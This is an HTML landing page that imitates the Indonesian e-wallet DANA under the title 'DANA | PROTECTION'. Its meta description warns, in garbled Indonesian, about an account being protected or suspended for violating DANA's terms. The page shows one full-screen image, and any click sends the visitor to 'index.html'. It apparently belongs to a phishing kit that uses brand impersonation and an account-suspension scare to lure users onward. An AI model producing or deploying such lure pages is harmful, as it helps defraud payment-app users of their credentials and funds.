<!DOCTYPE HTML>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">
    <meta name="description" content="Bukan akun Terprotesi atau di Tanggukan karena melanggar Syarat Ketentuan & Peraturan DANA ">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="theme-color" content="#0f78cb">
    <meta property="og:type" content="website">
    <title>DANA | PROTECTION</title>
    <link rel="icon" type="image/png" href="link_nempel.png.jpg"/>
<link rel="image_src" href="link_nempel.png.jpg"/>
<style>
    body, html {
      height: 100%;
      margin: 0;
      font-family: Arial, sans-serif;
    }
    .bg {
    
      background-image: url('muka_kau.jpg');
      height: 100%;
      background-position: center;
      background-repeat: no-repeat;
      background-size: cover;
      position: relative;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .overlay {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0); 
      display: flex;
      justify-content: center;
      align-items: center;
      color: white;
      text-align: center;
      font-size: 24px;
      padding: 20px;
      box-sizing: border-box;
    }
    @media (max-width: 768px) {
      .overlay {
        font-size: 18px;
      }
    }
  </style>
</head>
<body>

<div class="bg" onclick="redirect()">
  <div class="overlay"> </div>
</div>

<script>
  function redirect() {
    window.location.href = 'index.html';
  }
</script>

</body>
</html>
